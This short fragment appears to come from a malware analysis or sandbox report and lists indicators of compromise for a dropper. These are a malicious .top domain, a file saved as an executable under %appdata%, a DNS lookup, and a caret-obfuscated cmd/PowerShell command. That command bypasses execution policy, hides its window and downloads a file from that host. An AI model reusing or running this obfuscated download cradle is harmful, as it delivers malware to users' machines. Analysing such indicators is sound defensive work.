Technical Information
- http://cometogod.top/search.php as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^Ow^ERSHEl^L.^Ex^E^ -E^X^EcUt^ion^PO^lI^C^Y ^ByPa^S^s^ -NO^prO^fi^le^ -WinDOW^StYle hi^d^dEN^ (NEw-O^bJect^ sys^T^Em.N^ET.wE^B^CLIe^Nt).^DoW^n^LOaD^f^iL^E^('http://cometogod.top/se...
- DNS ASK co###ogod.top
- '<SYSTEM32>\cmd.exe' /c "p^Ow^ERSHEl^L.^Ex^E^ -E^X^EcUt^ion^PO^lI^C^Y ^ByPa^S^s^ -NO^prO^fi^le^ -WinDOW^StYle hi^d^dEN^ (NEw-O^bJect^ sys^T^Em.N^ET.wE^B^CLIe^Nt).^DoW^n^LOaD^f^iL^E^('http://cometogod.top/se...' (with hidden window)